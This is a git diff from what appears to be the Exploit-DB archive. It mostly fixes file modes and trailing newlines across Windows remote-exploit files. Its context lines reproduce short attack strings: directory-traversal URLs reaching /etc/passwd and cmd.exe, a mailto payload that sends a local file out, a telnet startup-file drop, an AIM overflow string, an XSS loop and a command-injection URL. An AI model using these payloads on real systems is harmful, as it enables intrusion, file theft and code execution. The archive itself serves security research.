-http://target/_private/shopping_cart.mdb \ No newline at end of file +http://target/_private/shopping_cart.mdb \ No newline at end of file diff --git a/platforms/windows/remote/20249.txt b/platforms/windows/remote/20249.txt old mode 100755 new mode 100644 index 9243c282e..7ca5a7c2e --- a/platforms/windows/remote/20249.txt +++ b/platforms/windows/remote/20249.txt @@ -4,4 +4,4 @@ It is possible for a malicious website operator to obtain copies of known files If the following code were to be inserted into a HTML document and a user were to load that particular webpage, the local file would be automatically sent from the Pegasus Mail client to the email address specified without any prior warning: -<img sr c="mailto:email@address.com -F c:\path\file.ext"> \ No newline at end of file +<img sr c="mailto:email@address.com -F c:\path\file.ext"> \ No newline at end of file diff --git a/platforms/windows/remote/20266.txt b/platforms/windows/remote/20266.txt old mode 100755 new mode 100644 index f5b103f09..2a3d20d17 --- a/platforms/windows/remote/20266.txt +++ b/platforms/windows/remote/20266.txt @@ -37,4 +37,4 @@ catch(e){} } catch(e){} }setTimeout("yuzi2()",1000); -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/windows/remote/20269.txt b/platforms/windows/remote/20269.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20283.txt b/platforms/windows/remote/20283.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20284.txt b/platforms/windows/remote/20284.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20287.c b/platforms/windows/remote/20287.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20288.c b/platforms/windows/remote/20288.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20298.c b/platforms/windows/remote/20298.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20300.c b/platforms/windows/remote/20300.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20301.php b/platforms/windows/remote/20301.php old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20305.txt b/platforms/windows/remote/20305.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20306.html b/platforms/windows/remote/20306.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20309.txt b/platforms/windows/remote/20309.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20318.txt b/platforms/windows/remote/20318.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20319.txt b/platforms/windows/remote/20319.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20324.txt b/platforms/windows/remote/20324.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20325.txt b/platforms/windows/remote/20325.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20334.java b/platforms/windows/remote/20334.java old mode 100755 new mode 100644 index e25427d66..bb1876beb --- a/platforms/windows/remote/20334.java +++ b/platforms/windows/remote/20334.java @@ -195,5 +195,4 @@ public class newftpbrute -}//class - \ No newline at end of file +}//class \ No newline at end of file diff --git a/platforms/windows/remote/20335.txt b/platforms/windows/remote/20335.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20371.txt b/platforms/windows/remote/20371.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20375.txt b/platforms/windows/remote/20375.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20384.txt b/platforms/windows/remote/20384.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20399.html b/platforms/windows/remote/20399.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20424.txt b/platforms/windows/remote/20424.txt old mode 100755 new mode 100644 index e7dd208bd..e8d0ac49a --- a/platforms/windows/remote/20424.txt +++ b/platforms/windows/remote/20424.txt @@ -185,4 +185,4 @@ Windows Media Player is an application used for digital audio, and video content It is possible for a user running Windows Media Player 7 to enable a skin (.wms) file and unknowingly execute an embedded malicious script. When a user attempts to retrieve a skin (.wms) file it is downloaded and resides on the user's local machine. If Windows Media Player is run with the malicious skin enabled, the Active X component would allow any arbitrary action to be achieved. Depending on internet security settings this vulnerability is also exploitable if the skin file in question resides on a web site. The script could automatically launch when a user visits the web site. -Execution of arbitrary scripts could make it possible for the malicious host to gain rights equivalent to those of the current user. \ No newline at end of file +Execution of arbitrary scripts could make it possible for the malicious host to gain rights equivalent to those of the current user. \ No newline at end of file diff --git a/platforms/windows/remote/20426.html b/platforms/windows/remote/20426.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20427.txt b/platforms/windows/remote/20427.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20445.txt b/platforms/windows/remote/20445.txt old mode 100755 new mode 100644 index 164a66628..255a99dc7 --- a/platforms/windows/remote/20445.txt +++ b/platforms/windows/remote/20445.txt @@ -8,4 +8,4 @@ A request similar to the following is used to exploit this: http://targethost/cgi-bin/test.bat?&dir -Variations may be possible or necessary, depending on the specific web server and configuration. \ No newline at end of file +Variations may be possible or necessary, depending on the specific web server and configuration. \ No newline at end of file diff --git a/platforms/windows/remote/20459.html b/platforms/windows/remote/20459.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20460.txt b/platforms/windows/remote/20460.txt old mode 100755 new mode 100644 index 2b9b6480c..96a06fc04 --- a/platforms/windows/remote/20460.txt +++ b/platforms/windows/remote/20460.txt @@ -54,4 +54,4 @@ KERNEL32!CreateFileA + 0x11B For additional information specific to this message please visit the Microsoft Online Support site located at: http://www.microsoft.com/contentredirect.asp. -By sending a carefully crafted HTTP request an attacker can bypass the total length check and overflow a local variable in PBSERVER.DLL allowing the execution of arbitrary code as user GUEST on the vulnerable machine. \ No newline at end of file +By sending a carefully crafted HTTP request an attacker can bypass the total length check and overflow a local variable in PBSERVER.DLL allowing the execution of arbitrary code as user GUEST on the vulnerable machine. \ No newline at end of file diff --git a/platforms/windows/remote/20461.txt b/platforms/windows/remote/20461.txt old mode 100755 new mode 100644 index 209354f2c..ed961e82b --- a/platforms/windows/remote/20461.txt +++ b/platforms/windows/remote/20461.txt @@ -14,4 +14,4 @@ ftp> put autoexec.bat %20..%20%20../winnt/2.bat 200 PORT Command successful. 150 Opening ASCII mode data connection for 2.bat. 226 Transfer complete. -ftp> dir \..%20.\..%20.\winnt\ \ No newline at end of file +ftp> dir \..%20.\..%20.\winnt\ \ No newline at end of file diff --git a/platforms/windows/remote/20481.txt b/platforms/windows/remote/20481.txt old mode 100755 new mode 100644 index 13e670579..803d4135d --- a/platforms/windows/remote/20481.txt +++ b/platforms/windows/remote/20481.txt @@ -5,4 +5,4 @@ Microsoft Internet Information Server (IIS) is a popular web server, providing s http://www.target.host/aspfile.asp. http://www.target.host/scriptfile.ht. http://www.target.host/scriptfile.id. -http://www.target.host/scriptfile.PL. \ No newline at end of file +http://www.target.host/scriptfile.PL. \ No newline at end of file diff --git a/platforms/windows/remote/20488.txt b/platforms/windows/remote/20488.txt old mode 100755 new mode 100644 index 65d238ba2..ce416bdb4 --- a/platforms/windows/remote/20488.txt +++ b/platforms/windows/remote/20488.txt @@ -7,4 +7,4 @@ It is possible to view the full contents of the directory structure of a system Eg. http://target:800/C:/ -will reveal a directory listing for drive C. \ No newline at end of file +will reveal a directory listing for drive C. \ No newline at end of file diff --git a/platforms/windows/remote/20489.txt b/platforms/windows/remote/20489.txt old mode 100755 new mode 100644 index 52a9d87d1..43be7cbc9 --- a/platforms/windows/remote/20489.txt +++ b/platforms/windows/remote/20489.txt @@ -6,4 +6,4 @@ It is possible for a remote user to gain access to any known file outside of the Successful exploitation of this vulnerability could enable a remote user to gain access to systems files, password files, etc. This could lead to a complete compromise of the host. -http://target/../../../filename.ext \ No newline at end of file +http://target/../../../filename.ext \ No newline at end of file diff --git a/platforms/windows/remote/20510.txt b/platforms/windows/remote/20510.txt old mode 100755 new mode 100644 index b91ce1de0..0d9a5b30c --- a/platforms/windows/remote/20510.txt +++ b/platforms/windows/remote/20510.txt @@ -8,4 +8,4 @@ It should be noted that the victim need only have AIM installed on their machine Successful exploitation of this vulnerability will lead to complete comprimise of the target host. -href="aim:goim? screenname=AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA&message=EIP,+the+other+white+meat" >here</a><br> \ No newline at end of file +href="aim:goim? screenname=AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA&message=EIP,+the+other+white+meat" >here</a><br> \ No newline at end of file diff --git a/platforms/windows/remote/20511.txt b/platforms/windows/remote/20511.txt old mode 100755 new mode 100644 index 5d4f50979..4d114bc32 --- a/platforms/windows/remote/20511.txt +++ b/platforms/windows/remote/20511.txt @@ -8,4 +8,4 @@ It should be noted that the victim need only have AIM installed on their machine Successful exploitation of this vulnerability will lead to complete comprimise of the target host. -aim:buddyicon?screenname=abob&groupname=asdf&Src=http://localhost/AAA... \ No newline at end of file +aim:buddyicon?screenname=abob&groupname=asdf&Src=http://localhost/AAA... \ No newline at end of file diff --git a/platforms/windows/remote/20528.html b/platforms/windows/remote/20528.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2054.txt b/platforms/windows/remote/2054.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20547.txt b/platforms/windows/remote/20547.txt old mode 100755 new mode 100644 index c59cfd0c8..53e785b57 --- a/platforms/windows/remote/20547.txt +++ b/platforms/windows/remote/20547.txt @@ -20,6 +20,4 @@ was not properly initialized or (2) is deleted, aka "Time Element Memory Corruption Vulnerability." -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20547.rar - - \ No newline at end of file +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20547.rar \ No newline at end of file diff --git a/platforms/windows/remote/20553.html b/platforms/windows/remote/20553.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20559.c b/platforms/windows/remote/20559.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20571.txt b/platforms/windows/remote/20571.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20582.c b/platforms/windows/remote/20582.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20584.txt b/platforms/windows/remote/20584.txt old mode 100755 new mode 100644 index 7a34b1eb0..8e0be0149 --- a/platforms/windows/remote/20584.txt +++ b/platforms/windows/remote/20584.txt @@ -8,4 +8,4 @@ ftp> ls c:/ 200 Port command successful. 150 Opening data connection for directory list. -(listing of c:\) \ No newline at end of file +(listing of c:\) \ No newline at end of file diff --git a/platforms/windows/remote/20590.txt b/platforms/windows/remote/20590.txt old mode 100755 new mode 100644 index 60188f424..edff2afdd --- a/platforms/windows/remote/20590.txt +++ b/platforms/windows/remote/20590.txt @@ -8,4 +8,4 @@ http://victim/scripts/iisadmin/bdir.htr??<path> eg., -http://www.victim-host.xxx/scripts/iisadmin/bdir.htr??d:\webs \ No newline at end of file +http://www.victim-host.xxx/scripts/iisadmin/bdir.htr??d:\webs \ No newline at end of file diff --git a/platforms/windows/remote/20600.c b/platforms/windows/remote/20600.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20605.cpp b/platforms/windows/remote/20605.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20607.txt b/platforms/windows/remote/20607.txt old mode 100755 new mode 100644 index 7a21b3fd2..79e5b6ed9 --- a/platforms/windows/remote/20607.txt +++ b/platforms/windows/remote/20607.txt @@ -8,4 +8,4 @@ http://target/..\..\..\..\..\..\filename Executing arbitrary commands: -http://target/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\ \ No newline at end of file +http://target/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\ \ No newline at end of file diff --git a/platforms/windows/remote/20608.txt b/platforms/windows/remote/20608.txt old mode 100755 new mode 100644 index 779cf02df..34b7e7714 --- a/platforms/windows/remote/20608.txt +++ b/platforms/windows/remote/20608.txt @@ -4,4 +4,4 @@ A remote user could gain read access to known files outside of the root director http://target/../[file outside web root] -http://target/.../[file outside web root] \ No newline at end of file +http://target/.../[file outside web root] \ No newline at end of file diff --git a/platforms/windows/remote/20612.txt b/platforms/windows/remote/20612.txt old mode 100755 new mode 100644 index 0e2c4cb6b..69ed51150 --- a/platforms/windows/remote/20612.txt +++ b/platforms/windows/remote/20612.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/2339/info It is possible for a remote user to gain read access to directories and files outside the root directory of a PicServer. Requesting a specially crafted URL composed of '../' or '.../' sequences will disclose an arbitrary directory. http://target/../[file outside web root] -http://target/.../[file outside web root] \ No newline at end of file +http://target/.../[file outside web root] \ No newline at end of file diff --git a/platforms/windows/remote/20614.txt b/platforms/windows/remote/20614.txt old mode 100755 new mode 100644 index 68f40ec78..4646efe58 --- a/platforms/windows/remote/20614.txt +++ b/platforms/windows/remote/20614.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2343/info It is possible for a remote user to gain read access to directories outside the root directory of an AOLserver. Requesting a specially crafted URL composed of '.../' sequences will disclose an arbitrary directory. -http://target/.../[file outside web root] \ No newline at end of file +http://target/.../[file outside web root] \ No newline at end of file diff --git a/platforms/windows/remote/20616.txt b/platforms/windows/remote/20616.txt old mode 100755 new mode 100644 index 07c9de806..4b0be71d1 --- a/platforms/windows/remote/20616.txt +++ b/platforms/windows/remote/20616.txt @@ -4,4 +4,4 @@ It is possible for a remote user to gain read access to directories and files ou http://target/../[file outside web root] -http://target/.../[file outside web root] \ No newline at end of file +http://target/.../[file outside web root] \ No newline at end of file diff --git a/platforms/windows/remote/20628.txt b/platforms/windows/remote/20628.txt old mode 100755 new mode 100644 index 0b3ad8ada..412a1e3c3 --- a/platforms/windows/remote/20628.txt +++ b/platforms/windows/remote/20628.txt @@ -4,4 +4,4 @@ A remote user could gain read access to known files outside of the root director http://target/cgi-bin/auktion.pl menue=../../../../../../../../../../../../../bin/pwd -http://target/cgi-bin/auktion.pl menue=../../../../../../../../../../../../../etc/passwd \ No newline at end of file +http://target/cgi-bin/auktion.pl menue=../../../../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/windows/remote/20637.txt b/platforms/windows/remote/20637.txt old mode 100755 new mode 100644 index ea6bdf44f..7cb89690d --- a/platforms/windows/remote/20637.txt +++ b/platforms/windows/remote/20637.txt @@ -4,4 +4,4 @@ It is possible for a remote user to gain read access to directories and files ou http://target/../../../scandisk.log -^^ = Will obviously open the scandisk.log file. \ No newline at end of file +^^ = Will obviously open the scandisk.log file. \ No newline at end of file diff --git a/platforms/windows/remote/20640.txt b/platforms/windows/remote/20640.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20647.c b/platforms/windows/remote/20647.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20653.txt b/platforms/windows/remote/20653.txt old mode 100755 new mode 100644 index f7806c45b..4f061f8f8 --- a/platforms/windows/remote/20653.txt +++ b/platforms/windows/remote/20653.txt @@ -17,4 +17,4 @@ Using this vulnerability to place a file on the target filesystem outside the ft ftp> put Lokale Datei c:\test.txt -Remotedatei ../autorun.bat \ No newline at end of file +Remotedatei ../autorun.bat \ No newline at end of file diff --git a/platforms/windows/remote/20657.txt b/platforms/windows/remote/20657.txt old mode 100755 new mode 100644 index 2922c3008..dabc3f42e --- a/platforms/windows/remote/20657.txt +++ b/platforms/windows/remote/20657.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2436/info It is possible for a remote user to gain read access to directories and files outside the web root. Requesting a specially crafted URL composed of '../' sequences will disclose an arbitrary directory, appending the known filename will disclose the requested resource. -http://target/../../../../../../Scandisk.log \ No newline at end of file +http://target/../../../../../../Scandisk.log \ No newline at end of file diff --git a/platforms/windows/remote/20661.txt b/platforms/windows/remote/20661.txt old mode 100755 new mode 100644 index fe58a8a78..9ce23ac5c --- a/platforms/windows/remote/20661.txt +++ b/platforms/windows/remote/20661.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2444/info A remote user could gain read access to directories outside of the ftp root in a Jarle Aase War FTPD Server. Once a user is logged into the server, a specially crafted 'dir' command will disclose an arbitrary directory. This vulnerability could allow an attacker to gain read access to various files residing on the target machine. -dir *./../.. \ No newline at end of file +dir *./../.. \ No newline at end of file diff --git a/platforms/windows/remote/20663.txt b/platforms/windows/remote/20663.txt old mode 100755 new mode 100644 index 9184f1f69..554c86380 --- a/platforms/windows/remote/20663.txt +++ b/platforms/windows/remote/20663.txt @@ -19,4 +19,4 @@ ftp> get autoexec.bat 150 Opening data connection for "/.../autoexec.bat". 250 RETR command successful. ftp: 383 bytes received in 0.16Seconds 2.39Kbytes/sec. -ftp> \ No newline at end of file +ftp> \ No newline at end of file diff --git a/platforms/windows/remote/20680.html b/platforms/windows/remote/20680.html old mode 100755 new mode 100644 index 984ab1203..fcb63675e --- a/platforms/windows/remote/20680.html +++ b/platforms/windows/remote/20680.html @@ -14,4 +14,4 @@ The following is an example of a malicious HTML message which could cause data t <frame src=telnet:-f%20\Documents%20and%Settings\All%20Users \start%20menu\programs\startup\start.bat%20host%208000> </frameset> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/windows/remote/20687.txt b/platforms/windows/remote/20687.txt old mode 100755 new mode 100644 index 264de64c9..3e2616645 --- a/platforms/windows/remote/20687.txt +++ b/platforms/windows/remote/20687.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2488/info Requesting a specially crafted URL to a machine running O'Reilly & Associates Website Professional, will disclose the physical path to the root directory. -www.example.com/:/ \ No newline at end of file +www.example.com/:/ \ No newline at end of file diff --git a/platforms/windows/remote/20688.txt b/platforms/windows/remote/20688.txt old mode 100755 new mode 100644 index e3b849755..d6801d9ab --- a/platforms/windows/remote/20688.txt +++ b/platforms/windows/remote/20688.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2490/info Eudora uses Internet Explorer to assist in the viewing of html messages if the 'Use Microsoft Viewer' option is enabled. Eudora also has a 'allow executables in HTML content' option, which the documentation recommends be disabled for securithy reasons. It is possible for an attacker to excecute arbitrary code on a remote system even if 'allow executables in HTML content' is disabled, if the 'Use Microsoft viewer' option is enabled. -http://www.malware.com/you!DORA.txt \ No newline at end of file +http://www.malware.com/you!DORA.txt \ No newline at end of file diff --git a/platforms/windows/remote/20716.txt b/platforms/windows/remote/20716.txt old mode 100755 new mode 100644 index 11a0887f2..5876621c0 --- a/platforms/windows/remote/20716.txt +++ b/platforms/windows/remote/20716.txt @@ -16,4 +16,4 @@ will disclose a directory listing from outside Tomcat's normal directory tree. http://www.example.com/%2e%2e/%2e%2e%5cfilename%00.jsp -will reveal the requested file [filename]. \ No newline at end of file +will reveal the requested file [filename]. \ No newline at end of file diff --git a/platforms/windows/remote/20717.txt b/platforms/windows/remote/20717.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2074.pm b/platforms/windows/remote/2074.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2075.pm b/platforms/windows/remote/2075.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20758.c b/platforms/windows/remote/20758.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20774.txt b/platforms/windows/remote/20774.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20775.txt b/platforms/windows/remote/20775.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20782.eml b/platforms/windows/remote/20782.eml old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20793.txt b/platforms/windows/remote/20793.txt old mode 100755 new mode 100644 index 269a68336..8ba917f0b --- a/platforms/windows/remote/20793.txt +++ b/platforms/windows/remote/20793.txt @@ -6,4 +6,4 @@ A problem in the software package could make it possible for remote users to gai This problem makes it possible for remote user to gain access to sensitive system files, and potentially local access. -http://vulnerable.system/\...\ \ No newline at end of file +http://vulnerable.system/\...\ \ No newline at end of file diff --git a/platforms/windows/remote/20794.c b/platforms/windows/remote/20794.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20803.txt b/platforms/windows/remote/20803.txt old mode 100755 new mode 100644 index c17bf405c..e382f2a44 --- a/platforms/windows/remote/20803.txt +++ b/platforms/windows/remote/20803.txt @@ -29,4 +29,4 @@ ftp> get ....\....\autoexec.bat ftp: 419 bytes received in 0.27Seconds 1.55Kbytes/sec. ftp> cd .... 250-ª¦Ã?++²¦-ñU¬+¦í 1323 mb -250 "/.." is current directory. \ No newline at end of file +250 "/.." is current directory. \ No newline at end of file diff --git a/platforms/windows/remote/20816.c b/platforms/windows/remote/20816.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20817.c b/platforms/windows/remote/20817.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20818.txt b/platforms/windows/remote/20818.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20819.txt b/platforms/windows/remote/20819.txt old mode 100755 new mode 100644 index c71257911..2bdc8bfc7 --- a/platforms/windows/remote/20819.txt +++ b/platforms/windows/remote/20819.txt @@ -23,4 +23,4 @@ ftp> ls c:\windows\desktop\*\*.* not found 226 File sent ok ftp: 36 bytes received in 0.06Seconds 0.60Kbytes/sec. -ftp> \ No newline at end of file +ftp> \ No newline at end of file diff --git a/platforms/windows/remote/20820.c b/platforms/windows/remote/20820.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20825.txt b/platforms/windows/remote/20825.txt old mode 100755 new mode 100644 index 1bec89b51..fb4207805 --- a/platforms/windows/remote/20825.txt +++ b/platforms/windows/remote/20825.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2697/info It is possible for an attacker to traverse the web folders of a Savant HTTP Server. Submitting a URL referring to a known directory or file, and appended with specific unicode characters, will disclose the contents of the requested resource. The unicode character in question is '%2f..'. This vulnerability could allow the reading of files on the target system. -http://example.com/%2f..%2f..%2f../filename \ No newline at end of file +http://example.com/%2f..%2f..%2f../filename \ No newline at end of file diff --git a/platforms/windows/remote/20826.txt b/platforms/windows/remote/20826.txt old mode 100755 new mode 100644 index b537b44f4..6a5dcc341 --- a/platforms/windows/remote/20826.txt +++ b/platforms/windows/remote/20826.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2699/info A vulnerability exists in Jason Rahaim's MP3Mystic Server which allows a remote user to traverse the directories of a target host. This may lead to the disclosure of file and directory contents. Arbitrary directories can be accessed through the inclusion of double dot '../' sequences when submitting a URL. -www.example.com/../scandisk.log \ No newline at end of file +www.example.com/../scandisk.log \ No newline at end of file diff --git a/platforms/windows/remote/20829.txt b/platforms/windows/remote/20829.txt old mode 100755 new mode 100644 index ca33ce867..7c7621227 --- a/platforms/windows/remote/20829.txt +++ b/platforms/windows/remote/20829.txt @@ -4,4 +4,4 @@ It is possible for a remote user to traverse the directories of a host running J www.example.com/%2e%2e/%2e%2e/ -www.example.com/%2e%2e/%2e%2e/filename \ No newline at end of file +www.example.com/%2e%2e/%2e%2e/filename \ No newline at end of file diff --git a/platforms/windows/remote/20835.c b/platforms/windows/remote/20835.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20836.c b/platforms/windows/remote/20836.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20838.c b/platforms/windows/remote/20838.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20840.txt b/platforms/windows/remote/20840.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20841.txt b/platforms/windows/remote/20841.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20842.txt b/platforms/windows/remote/20842.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20850.txt b/platforms/windows/remote/20850.txt old mode 100755 new mode 100644 index a69d33500..f79347c98 --- a/platforms/windows/remote/20850.txt +++ b/platforms/windows/remote/20850.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2729/info It is possible for a remote user to execute arbitrary commands on a host using Carello Shopping Cart software. A specially crafted HTTP request could cause inetinfo.exe to consume all available system resources, refusing any new connections. If arbitrary code is part of the HTTP request, it will be executed with the privileges of the web server. -http://foo.org/scripts/Carello/Carello.dllCARELLOCODE=SITE2&VBEXE=C:\..\winnt\system32\cmd.exe20/c20echo20test>c:\defcom.txt \ No newline at end of file +http://foo.org/scripts/Carello/Carello.dllCARELLOCODE=SITE2&VBEXE=C:\..\winnt\system32\cmd.exe20/c20echo20test>c:\defcom.txt \ No newline at end of file diff --git a/platforms/windows/remote/20884.txt b/platforms/windows/remote/20884.txt old mode 100755 new mode 100644 index 5977be0b1..0f365c727 --- a/platforms/windows/remote/20884.txt +++ b/platforms/windows/remote/20884.txt @@ -22,4 +22,4 @@ now we do : ftp://127.0.0.1/RESTRICTED/...%5c/ and we're out of the restricted subdirectory, we have -read access to the whole harddrive \ No newline at end of file +read access to the whole harddrive \ No newline at end of file diff --git a/platforms/windows/remote/20886.txt b/platforms/windows/remote/20886.txt old mode 100755 new mode 100644 index 2d57028f9..c6bdf074c --- a/platforms/windows/remote/20886.txt +++ b/platforms/windows/remote/20886.txt @@ -4,4 +4,4 @@ Submitting a specially crafted GET request for a known file (.php, .pl, or .shtm Example: -GET /filename.php%20 \ No newline at end of file +GET /filename.php%20 \ No newline at end of file diff --git a/platforms/windows/remote/20888.txt b/platforms/windows/remote/20888.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20893.txt b/platforms/windows/remote/20893.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20896.txt b/platforms/windows/remote/20896.txt old mode 100755 new mode 100644 index f15101754..ca2bf2dc0 --- a/platforms/windows/remote/20896.txt +++ b/platforms/windows/remote/20896.txt @@ -10,4 +10,4 @@ WebBoard is no longer supported by O'Reilly, it is currently maintained by ChatS An example of malicious javascript: -\');for(i=0;i<100000;i++) alert("not nice"); / \ No newline at end of file +\');for(i=0;i<100000;i++) alert("not nice"); / \ No newline at end of file diff --git a/platforms/windows/remote/20899.txt b/platforms/windows/remote/20899.txt old mode 100755 new mode 100644 index 4992f49b1..04939f2f6 --- a/platforms/windows/remote/20899.txt +++ b/platforms/windows/remote/20899.txt @@ -24,4 +24,4 @@ ADDRESS attacker@example.com. 3. Now, if while composing new message Target1 directly types e-mail address target2@example.com instead of Target2, Outlook will compose address as -"target2@example.com" <attacker@example.com> and message will be received by Attacker. \ No newline at end of file +"target2@example.com" <attacker@example.com> and message will be received by Attacker. \ No newline at end of file diff --git a/platforms/windows/remote/20903.html b/platforms/windows/remote/20903.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20912.txt b/platforms/windows/remote/20912.txt old mode 100755 new mode 100644 index a5640a132..da5a73ff5 --- a/platforms/windows/remote/20912.txt +++ b/platforms/windows/remote/20912.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2859/info A remote user could utilize the administrator functions of Interscan Viruswall without providing authentication credentials. This may allow the user to make configuration changes when submitting specially crafted URLs to the host. -http://VirusWall/interscan/cgi-bin/interscan.dll \ No newline at end of file +http://VirusWall/interscan/cgi-bin/interscan.dll \ No newline at end of file diff --git a/platforms/windows/remote/20931.c b/platforms/windows/remote/20931.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20934.txt b/platforms/windows/remote/20934.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20947.txt b/platforms/windows/remote/20947.txt old mode 100755 new mode 100644 index a4d037ed9..816ca1f56 --- a/platforms/windows/remote/20947.txt +++ b/platforms/windows/remote/20947.txt @@ -6,4 +6,4 @@ One of the components of this package, 'tradecli.dll', allows users to specify a This vulnerability may disclose sensitive information to attackers. -Exploit: http://host/script/tradecli.dll?template=..\..\..\..\..\path\to\file \ No newline at end of file +Exploit: http://host/script/tradecli.dll?template=..\..\..\..\..\path\to\file \ No newline at end of file diff --git a/platforms/windows/remote/20948.txt b/platforms/windows/remote/20948.txt old mode 100755 new mode 100644 index 7276c7e72..54659d034 --- a/platforms/windows/remote/20948.txt +++ b/platforms/windows/remote/20948.txt @@ -8,4 +8,4 @@ If the requested file does not exist, the error message will contain the absolut This information may assist in further attacks. -Exploit: http://host/scripts/tradecli.dll?template=nonexistfile \ No newline at end of file +Exploit: http://host/scripts/tradecli.dll?template=nonexistfile \ No newline at end of file diff --git a/platforms/windows/remote/20950.c b/platforms/windows/remote/20950.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20951.pm b/platforms/windows/remote/20951.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20980.c b/platforms/windows/remote/20980.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21003.txt b/platforms/windows/remote/21003.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21004.txt b/platforms/windows/remote/21004.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21009.c b/platforms/windows/remote/21009.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21030.txt b/platforms/windows/remote/21030.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21035.txt b/platforms/windows/remote/21035.txt old mode 100755 new mode 100644 index b3af02aa2..6932bc33e --- a/platforms/windows/remote/21035.txt +++ 